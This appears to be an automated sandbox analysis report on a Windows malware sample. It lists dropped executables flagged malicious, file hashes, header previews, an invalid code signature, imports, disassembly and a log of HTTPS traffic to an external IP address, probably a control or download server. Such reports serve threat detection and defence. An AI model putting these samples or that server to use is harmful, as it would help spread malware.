                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].dat

                                    Download File
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):5.067240743211155
                                    Encrypted:false
                                    SSDEEP:6:Wqz+RbLTQWwaahywqz+RdTQWwaVqdx9SK3TAn:MRbncRJVR/n
                                    MD5:FF6D9354842B497B290F2E5509598F49
                                    SHA1:4759F3F2D488558EBC30D7EF5118C27B74263B2D
                                    SHA-256:D26FFD662AD136301DB0E27A15447C11530D9BB5F7B2832ABCA227ED2ABB317D
                                    SHA-512:AF67A7A0266D0BF304761D28A11C561632D5CEB1E5EAD5D6BC2AC7B2DDF41F78FB7C1427CA23C848EF5E11F21CD616A4FFC02BF5401DB6DF6B2C3379DB56FE02
                                    Malicious:false
                                    Reputation:low
                                    Preview:....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@!n')O)))))))))))))))))))))))))))))))A]]Y*cvv....h.1p..].}>`{....rz=r....idt)JFD.d(ao.ooooooooooooooooooooooooooooooo....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@#n')O)))))))))))))))))))))))))))))))A]]Y*cvv....h.1p..].}>`{....rz=r....idt)JFD.b(ao.ooooooooooooooooooooooooooooooo....zww5PMP5555555555555555555555555555555555555CFPY6>w=QQ======================================jROY)8=.vskz.T..................................UkUh$...2x}hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

                                    C:\Users\user\Documents\c4wtKa.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):133136
                                    Entropy (8bit):6.350273548571922
                                    Encrypted:false
                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Documents\vselog.dll

                                    Download File
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):122880
                                    Entropy (8bit):6.002066263941358
                                    Encrypted:false
                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FF:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gF
                                    MD5:E3B74D8EADD94CCEB49435F9BA617289
                                    SHA1:5E7324DABD7A1CB5F6DC9E7D6C3E022511A3FFB2
                                    SHA-256:C4B771D38C0DFB51122B93C7B3F82849B0C669967C1E342D546C6FABFC8900F7
                                    SHA-512:63E71049A3AFD004E3BFFEF5A32A5CE656053D42E6C995DEF08C0E292EF44A7D69A0EF453B8EEFFC798FD7EB23A8924550D03A6114135E75124E064D8B9A31EA
                                    Malicious:true
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):0.1079397912024875
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:1387457-38765948.15.exe
                                    File size:30'954'656 bytes
                                    MD5:947cd5df10d540b879c037c1cb519e63
                                    SHA1:8e4f326d08b675c077dc1d19246bac5eaa0f73dc
                                    SHA256:29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
                                    SHA512:8516a7ff71fdcf2ff6e0210023fec4f064e0b3d3f520938a2259f0701bc69584239f502e0a11d1374cdf436d990b0592bd9c67c117ed7528c57e86c638c9631e
                                    SSDEEP:3072:H4Df3i8mhK5BSHO/3RBFADIDhwhKBE3Ukepa9Z2tH9bPP29NLG/ZWWHdpiQzQ:H4Dfy8neu/3/H9whKBE4eK/ZWW9piQzQ
                                    TLSH:6467281B5350E99DEC31B07CD0008795ABA27C253293FF9A52E07A9EDF721C19D2B627
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................85......85......85..............................QV/.............%.......%.........s.....%.......Rich...........

                                    File Icon

                                    Icon Hash:1268c4ce68328e40

                                    Static PE Info

                                    General

                                    Entrypoint:0x140004f04
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x660D9ED0 [Wed Apr 3 18:24:16 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:a960218d8123ac2428e0da4c17ab3175

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 06/05/2022 10:44:54 06/05/2024 10:44:54
                                    Subject Chain
                                    • CN=YANDEX LLC, O=YANDEX LLC, STREET="Leo Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                    Version:3
                                    Thumbprint MD5:07A79C5F2F79548D1AC45A792866ABD9
                                    Thumbprint SHA-1:F55522C99528A0C94883E56FF946AC088091E573
                                    Thumbprint SHA-256:1561AE150E66F6D2B3BCEDA46D46525EDCAF8697D3BC94485150865DC40EF888
                                    Serial:7904D32E74FC472B66C08A38

                                    Entrypoint Preview

                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007FBF0908789Ch
                                    dec eax
                                    add esp, 28h
                                    jmp 00007FBF09083677h
                                    int3
                                    int3
                                    retn 0000h
                                    int3
                                    and dword ptr [00016B45h], 00000000h
                                    ret
                                    dec eax
                                    mov dword ptr [esp+08h], ebx
                                    push ebp
                                    dec eax
                                    lea ebp, dword ptr [esp-000004C0h]
                                    dec eax
                                    sub esp, 000005C0h
                                    mov ebx, ecx
                                    mov ecx, 00000017h
                                    call 00007FBF0909203Dh
                                    test eax, eax
                                    je 00007FBF090874C6h
                                    mov ecx, ebx
                                    int 29h
                                    mov ecx, 00000003h
                                    call 00007FBF0908748Ah
                                    xor edx, edx
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    inc ecx
                                    mov eax, 000004D0h
                                    call 00007FBF09087E5Dh
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    call dword ptr [0000C08Eh]
                                    dec eax
                                    mov ebx, dword ptr [ebp+000000E8h]
                                    dec eax
                                    lea edx, dword ptr [ebp+000004D8h]
                                    dec eax
                                    mov ecx, ebx
                                    inc ebp
                                    xor eax, eax
                                    call dword ptr [0000C1F4h]
                                    dec eax
                                    test eax, eax
                                    je 00007FBF090874FEh
                                    dec eax
                                    and dword ptr [esp+38h], 00000000h
                                    dec eax
                                    lea ecx, dword ptr [ebp+000004E0h]
                                    dec eax
                                    mov edx, dword ptr [ebp+000004D8h]
                                    dec esp
                                    mov ecx, eax
                                    dec eax
                                    mov dword ptr [esp+30h], ecx
                                    dec esp
                                    mov eax, ebx
                                    dec eax
                                    lea ecx, dword ptr [ebp+000004E8h]
                                    dec eax
                                    mov dword ptr [esp+28h], ecx
                                    dec eax
                                    lea ecx, dword ptr [ebp-10h]
                                    dec eax
                                    mov dword ptr [esp+20h], ecx
                                    xor ecx, ecx
                                    call dword ptr [0000C1BBh]

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x19af00x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d770000x10400.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d760000xe7c.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1d82c000x28a0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d880000x640.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x187400x70.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x188b00x28.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x187b00x100.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x110000x2e8.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xf2dc0xf40092151013447fb3f2d89a0eb0689389efFalse0.5336353739754098data6.3728130766478825IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x110000x94b00x9600b6c5607f532945a497a3dd9ec32e34e8False0.42380208333333336data4.7375559254011765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x1b0000x1d5ace40x1d582003d87169ee8c7fd21de7968eb5c4a77d1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x1d760000xe7c0x1000ebfc7d80ce38e3ab843fa63d2287afdfFalse0.43701171875data4.481426700060546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x1d770000x104000x10400abe4ac1b8181f9a4987480c9413a557eFalse0.10115685096153847data3.008124803901922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1d880000x6400x8008a59f1b22252635e9e76e3c3f27b6b51False0.5537109375data4.840560734683175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1d776580x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.1312588568729334
                                    RT_ICON0x1d7b8800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.17022821576763486
                                    RT_ICON0x1d7de280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.2171669793621013
                                    RT_ICON0x1d7eed00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.35815602836879434
                                    RT_ICON0x1d7f3780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.1312588568729334
                                    RT_ICON0x1d835a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.17022821576763486
                                    RT_ICON0x1d85b480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.2171669793621013
                                    RT_ICON0x1d86bf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.35815602836879434
                                    RT_GROUP_ICON0x1d7f3380x3edataEnglishUnited States0.8225806451612904
                                    RT_GROUP_ICON0x1d870580x3edataEnglishUnited States0.8870967741935484
                                    RT_VERSION0x1d772b00x3a4dataRussianRussia0.4656652360515021
                                    RT_MANIFEST0x1d870980x365XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (809), with CRLF line terminatorsEnglishUnited States0.4844649021864212

                                    Imports

                                    DLLImport
                                    SHLWAPI.dllStrCmpIW, StrCatW, StrCpyW, PathAppendW
                                    KERNEL32.dllRtlCaptureContext, CreateFileW, WriteConsoleW, SetFilePointerEx, GetConsoleMode, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, RaiseException, LoadLibraryW, GetProcAddress, FreeLibrary, GetModuleFileNameW, FindFirstFileW, FindNextFileW, FindClose, DeleteFileW, OpenProcess, WaitForSingleObject, CloseHandle, TerminateProcess, GetCommandLineW, lstrcmpiW, lstrcpyW, ExitProcess, CreateToolhelp32Snapshot, Process32FirstW, GetCurrentProcessId, Thread32First, Thread32Next, Process32NextW, InitializeCriticalSectionEx, GetLastError, DeleteCriticalSection, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetFileType, IsDebuggerPresent, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, CreateEventW, GetModuleHandleW, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, SetLastError, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetCurrentProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, WriteFile, GetACP, LCMapStringW, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetEnvironmentStringsW, VirtualAlloc
                                    USER32.dllDispatchMessageW, PostThreadMessageW, CharNextW, GetMessageW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    RussianRussia

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 12, 2025 04:06:00.724414110 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:00.724450111 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:00.724533081 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:00.735547066 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:00.735563993 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:01.986825943 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:01.986891985 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:01.987627029 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:01.987674952 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.164906979 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.164920092 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.165213108 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.165270090 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.167433977 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.211350918 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.497431040 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.497611046 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.497636080 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.497853041 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.513173103 CET49981443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.513189077 CET4434998147.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.645697117 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.645720005 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:02.645817995 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.646325111 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:02.646339893 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.055962086 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.056245089 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.056626081 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.056633949 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.056838036 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.056844950 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.400116920 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.400177956 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.400440931 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.400464058 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.400544882 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.400567055 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.400638103 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.401957035 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.402050018 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.406227112 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.406312943 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.490519047 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.490623951 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.490660906 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.490672112 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.490719080 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.490773916 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.490782022 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.490833998 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.490889072 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.490987062 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.491066933 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.491072893 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.491096020 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.491164923 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.492404938 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.492564917 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.494510889 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.494621992 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.494626045 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.494648933 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.494692087 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.494746923 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.496825933 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.496922970 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.619837046 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.619941950 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620033979 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620126963 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.620141029 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620163918 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.620223045 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.620296955 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620385885 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.620389938 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620417118 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.620481968 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.620950937 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.621046066 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.621048927 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.621068954 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.621124029 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.621164083 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.621176958 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.621185064 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.621263027 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.621978998 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.622067928 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.622068882 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.622091055 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.622138023 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.622190952 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.622864962 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.622961044 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.622978926 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.623054028 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.623069048 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.623155117 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.623811007 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.623894930 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.623927116 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.624011993 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.624025106 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.624032974 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.624089956 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.624140978 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710124969 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710237026 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710264921 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710273027 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710335016 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710390091 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710396051 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710432053 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710458994 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710465908 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710516930 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710567951 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710573912 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710650921 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.710660934 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.710766077 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.734312057 CET49982443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.734323025 CET4434998247.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.765898943 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.765955925 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:04.766074896 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.766369104 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:04.766382933 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.105576038 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.106004000 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.106362104 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.106381893 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.106569052 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.106583118 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.460696936 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.460751057 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.460788965 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.460803986 CET4434998347.101.26.25192.168.2.5
